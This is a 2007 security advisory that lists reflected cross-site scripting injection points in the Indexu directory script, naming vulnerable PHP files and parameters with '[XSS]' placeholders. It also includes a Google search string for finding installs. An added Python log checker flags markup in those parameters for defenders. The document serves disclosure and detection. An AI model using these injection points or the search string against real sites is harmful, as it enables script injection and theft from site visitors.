securityvulns SECURITYVULNS:DOC:15739
Jan 17, 2007 - 12:00 a.m.

vulnerability script indexu all versions

Found by :SwEET-DeViL & viP HaCkEr & HaCkEr sUn
TeaM AL-GaRNi
Application : indexu
version : all versions
URL : http://www.nicecoder.com/
google : "Powered by INDEXU 5."

Exploits :
|//1\\|
in upgrade.php
http://www.site.com/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=[XSS] ___or #…/index.php
AND Local File Include~
##########################
|//2\\|
in suggest_category.php
http://www.site.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS]
##########################
|//3\\|
in user_detail.php
http://www.site.com/INDEXU_PATH/user_detail.php?u=[XSS]
##########################
|//4\\|
in tell_friend.php
http://www.site.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?id=[XSS]
##########################
|//5\\|
in sendmail.php
http://www.site.com/INDEXU_PATH/sendmail.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?email=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?name=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?subject=[XSS]
##########################
|//6\\|
in send_pwd.php
http://www.site.com/INDEXU_PATH/send_pwd.php?email=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?username=[XSS]
##########################
|//7\\|
in search.php
http://www.site.com/INDEXU_PATH/search.php?keyword=[XSS]
##########################
|//8\\|
in register.php
http://www.site.com/INDEXU_PATH/register.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/register.php?username=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password2=[XSS]
http://www.site.com/INDEXU_PATH/register.php?email=[XSS]
##########################
|//9\\|
in power_search.php
http://www.site.com/INDEXU_PATH/power_search.php?url=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?contact_name=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?email=[XSS]
##########################
|//10\\|
in new.php
http://www.site.com/INDEXU_PATH/new.php?path=[XSS]
http://www.site.com/INDEXU_PATH//new.php?total=[XSS]
##########################
|//11\\|
in modify.php
http://www.site.com/INDEXU_PATH/modify.php?pflag=search&query=[XSS]
##########################
|//12\\|
in mailing_list.php
http://www.site.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/mailing_list.php?email=[XSS]
##########################
|//13\\|
in login.php
http://www.site.com/INDEXU_PATH/login.php?error_msg=[XSS]
##########################
|//…$…\\|
There is another vulnerability in the program, an XSS
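
For operators of an affected install, the script/parameter list above can be turned into an access-log check. This is an added example, not part of the original advisory: the combined log format, the function name suspicious_params and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters, copied from the advisory's list above.
REFLECTED = {
    "upgrade.php": {"gateway"},
    "suggest_category.php": {"error_msg"},
    "user_detail.php": {"u"},
    "tell_friend.php": {"friend_name", "friend_email", "error_msg", "my_name", "my_email", "id"},
    "sendmail.php": {"error_msg", "email", "name", "subject"},
    "send_pwd.php": {"email", "error_msg", "username"},
    "search.php": {"keyword"},
    "register.php": {"error_msg", "username", "password", "password2", "email"},
    "power_search.php": {"url", "contact_name", "email"},
    "new.php": {"path", "total"},
    "modify.php": {"query"},
    "mailing_list.php": {"error_msg", "email"},
    "login.php": {"error_msg"},
}

# Characters that change HTML context when echoed back unencoded.
MARKUP = re.compile(r"[<>\"']")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return [(script, param)] for listed parameters whose decoded value carries markup."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]  # tolerates the doubled slash seen in some URLs
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in REFLECTED.get(script, ()) and MARKUP.search(value):
            hits.append((script, name))
    return hits

# Constructed sample log lines (not from the advisory).
SAMPLE = [
    '192.0.2.10 - - [17/Jan/2007:10:00:00 +0000] "GET /indexu/search.php?keyword=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 512',
    '192.0.2.11 - - [17/Jan/2007:10:00:05 +0000] "GET /indexu/search.php?keyword=hotels HTTP/1.1" 200 498',
    '192.0.2.12 - - [17/Jan/2007:10:00:09 +0000] "GET /indexu//new.php?total=5&path=%22%3E HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(suspicious_params(line))
```

Apostrophes in legitimate values will produce false positives, so treat hits as leads for review; the fix itself is HTML-encoding these parameters on output.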